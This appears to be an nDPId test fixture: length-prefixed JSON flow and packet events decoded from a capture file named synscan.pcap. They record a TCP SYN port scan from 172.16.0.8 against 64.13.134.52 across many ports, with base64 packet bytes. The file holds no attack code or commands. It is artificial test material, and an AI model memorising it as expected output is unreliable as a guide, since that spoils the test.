+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsm34AACcGhfSsEAAIQA2GNIzSDIvdUoMYAAAAAGACEAAcBAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRcAACcGWFusEAAIQA2GNIzSTv3dUoMYAAAAAGACEADZkQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAAAADYG1nKsEAAIQA2GNIzSGgvdUoMYAAAAAGACDAAShAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAscNkAACkGrpmsEAAIQA2GNIzSG7\/dUoMYAAAAAGACCAAU0AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzsAACgGxTesEAAIQA2GNIzSB9rdUoMYAAAAAGACBAAstQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAseaYAADcGl8ysEAAIQA2GNIzSeOfdUoMYAAAAAGACEACvpwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAstGYAACYGbgysEAAIQA2GNIzSBEHdUoMYAAAAAGACDAAoTgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060968,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_packet_id":1,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060968,"pkt":"ACYLMQczACWzv5HuCABFAAAs5AYAADgGLGysEAAIQA2GNIzSC17dUoMYAAAAAGACBAApMQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060969,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_packet_id":1,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060969,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/oAACUGE3msEAAIQA2GNIzSFO3dUoMYAAAAAGACCAAbogAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeMAADAGBpCsEAAIQA2GNIzTAgPdU4MZAAAAAGACBAAyiQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmQAACcG4w6sEAAIQA2GNIzTCk7dU4MZAAAAAGACEAAePgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAs2NYAACkGRpysEAAIQA2GNIzTFa7dU4MZAAAAAGACCAAa3gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/QAADMGhX6sEAAIQA2GNIzSGvXdUoMYAAAAAGACEAANmgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsDT8AACsGEDSsEAAIQA2GNIzSZIfdUoMYAAAAAGACEADEBwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMsAADQGZ6esEAAIQA2GNIzSGzndUoMYAAAAAGACBAAZVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsXC4AACkGw0SsEAAIQA2GNIzSC7vdUoMYAAAAAGACCAAk1AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDIAADEGy0CsEAAIQA2GNIzSC8PdUoMYAAAAAGACCAAkzAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsR\/MAADsGxX+sEAAIQA2GNIzSw1LdUoMYAAAAAGACEABlPAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAskHEAACwGjAGsEAAIQA2GNIzSJw7dUoMYAAAAAGACBAANgQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLkAAC0G3rmsEAAIQA2GNIzSD57dUoMYAAAAAGACCAAg8QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIoAADQGV+isEAAIQA2GNIzSB9bdUoMYAAAAAGACBAAsuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAso+IAADgGbJCsEAAIQA2GNIzSBDjdUoMYAAAAAGACBAAwVwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0IAACwGHTCsEAAIQA2GNIzSF3bdUoMYAAAAAGACBAAdGQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsVSwAADEGwkasEAAIQA2GNIzSC73dUoMYAAAAAGACCAAk0gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrsAADsGjresEAAIQA2GNIzSFgHdUoMYAAAAAGACEAASjgAAAgQFtA=="} 
